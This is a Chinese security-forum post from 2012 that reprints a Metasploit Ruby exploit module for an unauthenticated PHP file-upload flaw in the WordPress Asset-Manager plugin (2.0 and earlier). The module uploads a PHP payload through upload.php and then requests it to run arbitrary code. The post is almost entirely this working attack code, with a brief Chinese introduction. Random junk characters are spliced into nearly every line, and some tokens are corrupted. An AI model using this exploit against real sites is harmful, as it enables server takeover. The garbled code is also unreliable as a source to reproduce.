中国网络渗透测试联盟

标题: WordPress Asset-Manager PHP文件上传漏洞 [打印本页]
作者: admin    时间: 2012-12-31 09:22
标题: WordPress Asset-Manager PHP文件上传漏洞
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。8 b0 B1 z& z- C
0 g( L( K. a' v2 C% T; o& _
##! B8 ~2 P+ g$ {* W. v
# This file is part of the Metasploit Framework and may be subject to$ T, j% k$ P! E# y# X& W; _
# redistribution and commercial restrictions. Please see the Metasploit: Q& I, G+ {+ L) U
# Framework web site for more information on licensing and terms of use.9 c7 x! Z: v5 X8 E" w( a0 ^3 f  N
#   http://metasploit.com/framework/
( j% l: X2 U: i" ?7 s( R& r##/ U! n1 B( i7 d+ C7 y

& b2 s3 s! e7 }* j9 J9 J5 `; srequire 'msf/core'
7 k* {( @8 F" ~) frequire 'msf/core/exploit/php_exe'* R% Z6 N  M0 H3 t% J

1 M: x" f1 S7 d+ W) tclass Metasploit3 < Msf::Exploit::Remote+ W$ V% E( N' d# @* k: V: a
  Rank = ExcellentRanking  b# Z' ~$ j+ V- V7 }5 c- s5 l

8 ?8 s! _( D% p  c  include Msf::Exploit::Remote::HttpClient* U! E2 ]& R! j6 T, v1 g
  include Msf::Exploit:hpEXE
  M8 W, x6 m8 g/ S3 B( s 4 _9 L5 C) a$ ]
  def initialize(info = {})
& Q; T8 j3 q$ X* P8 w2 \    super(update_info(info,% Q" l3 B+ {) u- H" o. y: g
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',/ ?. B5 d8 C. e9 h
      'Description'    => %q{
$ X9 K4 X" j# J! }1 S/ _8 |% s0 E        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
$ x8 d; e, K4 x1 s; c8 M! u5 A        plugin.  By abusing the upload.php file, a malicious user can upload a file to a" Y0 v5 n, x  V& L' N* X* W% u
        temp directory without authentication, which results in arbitrary code execution.% b4 B4 G- Q, ^
      },& z7 p+ R% ~, j( R0 }
      'Author'         =>1 D8 ]6 ?! n; B* b. ~
        [
7 H0 ~  F3 J9 c' z4 p5 [! G( I          'Sammy FORGIT', # initial discovery
) M4 Q8 G; J9 `0 m' Z) p          'James Fitts <fitts.james[at]gmail.com>' # metasploit module6 Q+ L% z9 A- ~( T+ X0 T7 _3 A
        ],
" e# n: Q. P. B# e* G  B7 ]      'License'        => MSF_LICENSE,
- N! ]9 ~; G3 o$ @2 y      'References'     =>+ t0 N! q' v6 c: Y" \- R
        [& N9 f) h/ i! l8 s* Q* J" x
          [ 'OSVDB', '82653' ],, Z. i0 [- S5 M# X- ^& t, l% B
          [ 'BID', '53809' ],( _! ^8 G9 r4 x
          [ 'EDB', '18993' ],
! X  E5 V# F9 t9 o# d          [ 'URL', 'http:// www.myhack58.com /' ]; l. O8 ~/ \2 |" L. g
        ],
+ O4 a4 B; k4 |% g: `3 u      'Payload'       =>
' @( h9 a7 _6 e( ]+ |        {
1 j( Z) F- W- z          'BadChars' => "\x00",/ w, F4 l5 p0 |3 w
        },- Q) p# S8 f6 w
      'Platform'       => 'php',6 u7 V; Q. `9 r
      'Arch'           => ARCH_PHP,5 W8 a/ E5 Z' Y# r& q
      'Targets'        =>
: C* H  H* m- d# B+ N        [
9 ]! a' O3 Q( Y8 K- i3 N" }- w' s          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
1 ^8 I( [" Q# u' x5 r          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], q1 S5 S; N# w7 b9 @( |
        ],
. `- ~1 [, C3 r. D      'DefaultTarget' => 0,
" a+ B' P- e" V# r" a2 b7 j, H( J      'DisclosureDate' => 'May 26 2012'))
% u4 f9 ^/ V4 t: J9 `* L; `+ h & D8 ]& q. X* K4 ^% A( o2 K0 t
    register_options(
1 z& }( L' O7 g# }2 T& C      [
3 j2 L, H* y- a        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
$ ^9 @1 z$ V" y8 T      ], self.class)5 c5 I6 @2 q& ?! n  x, v
  end* e1 F: M/ b9 N" K* U( l0 t* |

7 V- |: J4 d% d/ c& D  def exploit
# R4 S; C. M+ q) W0 }) F& D1 Y' H6 G    uri =  target_uri.path/ \. N) ]; F- ?) e* {
    uri << '/' if uri[-1,1] != '/'; M$ Y' w# U! Z# O1 c
    peer = "#{rhost}:#{rport}"- e6 H# P% L# Z9 v) Q% i
    payload_name = "#{rand_text_alpha(5)}.php"2 |3 U+ O/ h$ D& e
    php_payload = get_write_exec_payload(:unlink_self=>true)
, `+ L2 @% n. h& q+ D% U % b6 ^/ f, s' n1 k4 u" A1 ~' L( }' P' r
    data = Rex::MIME::Message.new: a, c! D% u0 }- w' J" g3 f
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
  B9 N3 B: L# |& a! o    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')$ S5 ]% w6 J: m, ^$ O& r$ n
5 @" w# N3 s& B% _7 a# h: R; j; f; m
    print_status("#{peer} - Uploading payload #{payload_name}")0 L. O: q+ J0 f2 S; `' S
    res = send_request_cgi({
7 f9 ^; f4 n6 W/ F' Y5 n      'method'  => 'POST',' ?# H* e$ g& K( ~' ?% f4 D5 p+ G
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",6 T( p5 g! T4 ?) @) u
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",0 ]7 q! ^/ ?6 [! a: l8 }# r2 w
      'data'    => post_data
$ ^* b6 E5 I, F8 W  b1 u* F    })
3 ^' J) J* [# E/ w5 {6 g
. u) x( e- c- {7 S$ w5 x2 `    if not res or res.code != 200 or res.body !~ /#{payload_name}/. K7 O1 Z) K! h( g) _0 u: j
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")7 |- m9 G' S2 G- N; [) w
end2 S1 g/ U4 R+ h$ q; |4 l

0 w/ z+ j& C2 z" N, V    print_status("#{peer} - Executing payload #{payload_name}")
; x. ~' ?0 Z  e4 L1 F- U; g    res = send_request_raw({
3 x; F  E2 l- q3 @, b5 @$ j  |/ ^      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",3 {# S9 ^. [2 F8 t* q7 E
      'method'  => 'GET'
9 z- ~" W  A8 Y+ a    })
4 X1 f4 v3 j6 O! h. c* |  m 5 A- z5 h$ L9 w& t( `. W( I. j
    if res and res.code != 2004 Q3 \" h8 N1 u
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
  W& F6 [4 G# g  C! ^    end) \! M  G, H  M) y$ a% e! a  z2 g' A
  end1 ]2 R: \; t% ]
end
& R' M) i; J( P' C



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2